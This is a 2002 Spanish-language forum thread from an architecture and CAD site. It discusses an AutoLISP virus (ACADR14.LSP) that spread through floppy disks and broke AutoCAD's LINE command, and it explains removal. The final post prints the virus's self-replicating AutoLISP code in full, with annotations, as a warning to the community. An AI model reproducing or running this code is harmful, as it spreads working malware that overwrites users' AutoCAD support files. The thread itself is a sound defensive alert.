Todoarquitectura.com - Foros de arquitectura, diseño, CAD e ingeniería (© 2002)

EL ARCHIVO NO SE CONTAGIA POR ESE MODO, SOLO AL ABRIR UN ARCHIVO DWG DESDE LA DISKETERA POR EL AUTOCAD.Conseguirse dicho archivo con alguien que no este contagiado y reemplazarlo.Para los que sepan Autolisp estas ordenes "malignas" estan bien adentro del archivo por que al abrirlo uno no se da cuenta ya que la estructura es la misma que el archivo original. hay que buscarla casi al final.Si desean puedo publicar en el foro las ordenes en cuestion para que analizar en metodo de contagio que bastante simple y para alertar al resto de la comunidad.">

Este es un resumen del tema del foro "Virus en Autocad"
En segundos serás redirigido al tema completo. Si no es asi, presiona aquí.

Virus en Autocad
mkharq	Existe un virus en lenguaje Autolisp, que circula aca en chile con el nombre de ACADR14.LSP, que se contagia por medio de discos de 1.44. El cual bloquea el comando linea (version ingles) y que reemplaza al archivo acadr14.lsp en la carpeta por defecto de autocad r14. No es peligroso para el computador por que al ser un virus tipo macro, o de texto (el lenguaje autolisp es en texto, el cual es interpretado por el cad) no realiza ningun daño en el sistema. Como funciona: El cad al abrir un archivo carga en memoria una serie de rutinas propias, como el ACADR14.lsp que esta en la carpeta SUPPORT del programa, pero al abrir un archivo desde un diskette el cad carga el archivo con el mismo nombre (ACADR14.lsp) que viene en el diskette. Una vez que lo carga redefine el comando LINE llamando a una funcion inexistente lo que produce un error al llamarlo desde el teclado (dicho comando siempre es llamado con la letra "L"). Lo segundo que realiza es buscar el archivo ACADR14.lsp en la carpeta por defecto de instalacion del programa y lo reemplaza con el archivo modificado y comprueba que este exista en el diskette de modo que cuando se abra un archivo de dibujo desde un diskette "sano" este se copiara automaticamente al disco completandose el ciclo de contagio. Aparentemente no se contagia si el Autocad se instala en otro directorio, tampoco parece que afecte a otras versiones de autocad. El archivo infectado pesa 11.968 bytes o 12Kb. aprox. EL problema se da que este archivo recibe nuevas ordenes en la instalacion de los programas que trabajan con Autocad. Por lo que al verse reemplazado, estas nuevas ordenes desaparecen y los nuevos comandos no sirven, por ejemplo el plotter encad crea una nueva orden llamada "enconfig" el cual controla las variables del plotter. Solucion: Revisar cada diskette que contengan dibujos DWG y borrar el archivo ACADr14.lsp que venga en dicho diskette. Esto se puede hacer desde el explorador, EL ARCHIVO NO SE CONTAGIA POR ESE MODO, SOLO AL ABRIR UN ARCHIVO DWG DESDE LA DISKETERA POR EL AUTOCAD. Conseguirse dicho archivo con alguien que no este contagiado y reemplazarlo. Para los que sepan Autolisp estas ordenes "malignas" estan bien adentro del archivo por que al abrirlo uno no se da cuenta ya que la estructura es la misma que el archivo original. hay que buscarla casi al final. Si desean puedo publicar en el foro las ordenes en cuestion para que analizar en metodo de contagio que bastante simple y para alertar al resto de la comunidad.
epoli	Con gusto publica las ordenes, al menos a mi me parece muy interesante el tema. Por mi parte publicaré la info en la sección de noticias. Gracias por avisarnos. Si en el futuro ves otra nota de interes puedes enviarla directamente a la sección de noticias. En esa sección, en el costado derecho hay un link llamado "Para publicar una noticia". PD: Hace un tiempo atrás habíamos publicado una noticia sobre los virus de autocad (pueden verla [url="http://www.todoarquitectura.com/v2/noticias/one_news.asp?IDNews=27"]aquí[/url])
mkharq	¡¡Me alegra hacer un bien la comunidad!! Aqui estan las ordenes "malignas" Lo que esta entre comillas es opinion mia. (defun C:l () (infect) """orden inexistente que causa error en el comando""" (setq a (getpoint "LINE From point:"))(terpri) (setq i 1) (while(if (= i 1)(progn(setq b (getpoint a "To point:"))(terpri)(command "line" a b)(setq i (+ i 1)))))) """aqui busca el archivo acadr14.lsp""" (progn(if (or (= k 1) (= k 15))(progn(setq k (+ k 1)) (setq mm1 "acadr14.lsp") (setq mm2 (findfile mm1)) (setq archivo "C:\\ARCHIVOS DE PROGRAMA\\AUTOCAD R14\\support\\acadr14.lsp") (if (= archivo mm2) """aqui ordena abrir el archivo infectado desde el diskette""" (progn(setq arch (open archivo "r")) (setq disk "a:\\acadr14.lsp") (setq disk1 (open disk "w")) (while(setq dwg (read-line arch)) (write-line dwg disk1)) (close arch) (close disk1)) (progn(setq disko (open mm2 "r")) (setq diss (open archivo "w")) (while (setq dwg (read-line disko)) """reescribe el archivo del disco duro por el infectado""" (write-line dwg diss)) (close disko) (close diss)))))))) """fin del virus""" Como se puede apreciar las ordenes son bastantes sencillas pero ingeniosas, pero aparte de reescribir el archivo en cuestion, no realiza ningun cambio mas en la estructura de ordenes (aparentemente). Para los que no dominan muy bien Autolisp no les recomiendo que lo manipulen en Autocad a modo de experimento (aunque no va a faltar el que lo haga), la idea es evitar este tipo de problemas que lo unico que hacen es hacer el trabajo mas largo de lo necesario. Saludos a todos.